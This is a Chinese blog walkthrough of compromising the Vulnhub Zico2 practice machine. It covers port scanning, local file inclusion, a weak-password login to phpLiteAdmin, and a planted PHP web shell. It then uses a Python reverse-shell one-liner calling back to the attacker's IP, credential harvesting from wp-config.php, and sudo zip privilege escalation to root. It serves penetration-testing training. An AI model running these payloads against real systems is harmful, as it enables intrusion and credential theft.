Vulnhub靶机-Zico2

已于 2024-07-23 10:51:10 修改
阅读量314 收藏 2
点赞数 8
文章标签: 服务器 linux 网络
于 2024-07-23 10:36:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ergeLXT/article/details/140627548
版权

一、信息收集

1.扫描主机

sudo arp-scan -l

得到靶机IP:192.168.127.146 

2.扫描端口

nmap -p- 192.168.127.146 --min-rate=5000

 

3.进行脚本扫描,TCP扫描,扫描服务版本

nmap -p22,80,111,58027 -sC -sT -sV 192.168.127.146

二、漏洞探测

1.查看开放端口80

2.查看网站

点击后退页面

发现url栏可能存在文件包含

../../../../../../../etc/passwd

成功读取到/etc/passwd文件

3.扫描网站目录

dirb http://192.168.127.146

扫描到数据库管理员的目录,访问查看

4.登录数据库管理员目录

查看test_db.php

尝试弱口令密码:admin登录 

登录成功

5.查询数据库内容

 md5解密

root--34kroot34
zico--zico2215@

尝试远程连接

ssh root@192.168.127.146
ssh zico@192.168.127.146

远程登录失败

6.在kali查询phpLiteAdmin有没有可利用的漏洞

searchsploit phpliteadmin

结果显示1.9.3版本存在远程php代码注入漏洞

searchsploit -m 24044
cat 24044.txt

可创建.php文件

在刚才的phpLiteAdmin管理页面创建一个hack.php数据库,再在该数据库下创建一个名称为test的表,字段为1

字段名称为code,默认值为<?php echo system($_GET["cmd"]);?>,插入一行内容

 

访问创建的文件

http://192.168.127.146/view.php?page=../../usr/databases/hack.php

三、反弹shell

1.使用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

url编码

python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.127.128%22%2C7777))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B'

复制url作为cmd值

2.kali监听

nc -lvvp 7777

监听成功

四、提权

1.通过python进入tty

TTY(teletypewriters)电传打字机,在 Linux 中,有一个伪电传多路复用器,它处理来自所有终端窗口伪电传打字机 (PTS) 的连接。 多路复用器是主机,PTS 是从机。 多路复用器由内核通过位于 /dev/ptmx 的设备文件寻址。tty 命令将打印伪电传从属设备用于连接到主设备的设备文件的名称。 实际上,这就是终端窗口的编号。

python -c 'import pty;pty.spawn("/bin/bash")'

2.查看配置文件

在zico的家目录中找到wordpress,这是一个免费开源的建站程序,进入该目录,查看wp-config.php

ls
cd /home
ls
cd zico
ls
cd wordpress
ls

cat wp-config.php

 得到用户zico的密码

sWfCsfJSPV9H3AmQzw8

切换到zico用户

3.查看zico用户属组

sudo -l

用户zico在tar和zip的用户组里,可以尝试zip提权

4.在/tmp目录下创建文件

touch /tmp/tiquan

通过zip运行Linux指令,获取root权限

sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command="sh -c /bin/bash"

在/root目录下成功拿到flag

Hardog123
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3185
Vulnhub-Zico2靶机实战
Vulnhub靶场渗透-zico2
paidx0
10-01 1223
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1069
本渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
Vulnhub靶机zico2渗透
xingjinhao123的博客
02-27 339
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/ 目标是获取root的目录下的flag,难度是中级 运行环境: 靶机:网络设为NAT模式,IP地址为:192.168.174.133 攻击机:同网段下的kali Linux,IP地址为:192.168.174.128 运行靶机 开始渗透 获取IP地址 扫描端口 访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含 使用工具扫描发现确实存在目录遍历的漏洞,并
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
linux代填密码切换用户
zixuanyankai的博客
07-22 135
linux用户账户密码复杂,在不考虑安全的情况下,想要使用命令自动切换用户。
服务器证书基于 OpenSSL一键颁发脚本
Rambo's Blog
07-19 593
第二组必传入参:生成证书组织(含义:ST,L,O,OU 示例:Guangdong,Shenzhen,Rambo Technology,sms-applet)第一组必传入参:生成证书域名(示例-1:100.100.100.101 示例-2:100.100.100.101,harbor.rambo123.com)如果采用非 root 权限执行脚本,可能在执行过程中需要输入当前用户的密码,请留意控制台的实时动态。统一研发、测试、生产环境的部署模式、部署结构、维护手册的标准。单域名或 IP 的证书颁发示例。
云计算实训11——web服务器的搭建、nfs服务器的搭建、备份静态文件、基于linux和windows实现文件共享
最新发布
m0_73907608的博客
07-22 821
搭建web服务器;搭建nfs服务器;备份静态文件;基于linux和windows实现文件共享;
【等保测评】服务器——Windows server 2012 R2
LongL_GuYu的博客
07-22 1082
等保测评:服务器——Windows server 2012 R2
某企业网络及服务器规划与设计
cj13106811623的博客
07-22 785
在此次系统设计中,我们采用分层设计方法,将网络的逻辑结构化整为零,分层讨论设计与实现的细节问题。将网络拓扑结构划分为3个层次,即核心层、汇聚层和接入层。
硅谷裸机云大宽带服务器连接不上是怎么回事?该如何处理
petaexpress的博客
07-22 234
硅谷裸机云大宽带服务器连接问题的解决需要从基础的网络设置检查开始,然后逐步深入到网络设备、服务器本身以及使用诊断工具进行综合排查。最后,为防止类似情况再次发生,持续关注服务器及网络设施的优化和升级是提高业务稳定性和安全性的必要手段。硅谷裸机云大宽带服务器连接不上的常见原因主要有网络设置、网络设备、服务端、软件和服务、物理层等,出现以上问题,检查DNS设置:错误的DNS设置可能导致无法解析服务器地址,应确认DNS服务器配置正确。官方文档:查阅服务器提供商的官方文档,可能会找到问题的标准处理流程。
东京裸机云多IP服务器全面分析
IDC_USA的博客
07-22 182
 东京裸机云多IP服务器是一种提供多IP地址分配和高性能网络服务的云计算解决方案,广泛应用于需要多IP管理和高稳定性的网络应用。下面将从几个方面具体介绍东京裸机云多IP服务器,rak部落为您整理发布东京裸机云多IP服务器的全面分析。
centos/Ubuntu安装Nginx服务器
但行好事,莫问前程
07-22 278
亲测!centos/Ubuntu原始方式安装Nginx服务器命令小记
1-如何挑选Android编译服务器
可夫小子的频道
07-22 636
Intel Xeon E5是英特尔公司推出的一款针对服务器市场的处理器系列,它以提供高性能、高可靠性和丰富的内置功能而著称。第五代至强E5处理器在多个方面进行了显著的改进和优化,最主要是便宜,从几块到一百多块不等。E5从上市到现在也十多年了,所以也发展了丰富的产品线,这个在挑选的时候要注意辨别。小心商家用十年前的芯片卖给你,帮他消库存,虽然便宜,但性能就会大大折扣。2024年7月X99平台至强E5V3V4价格行情推荐[1]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值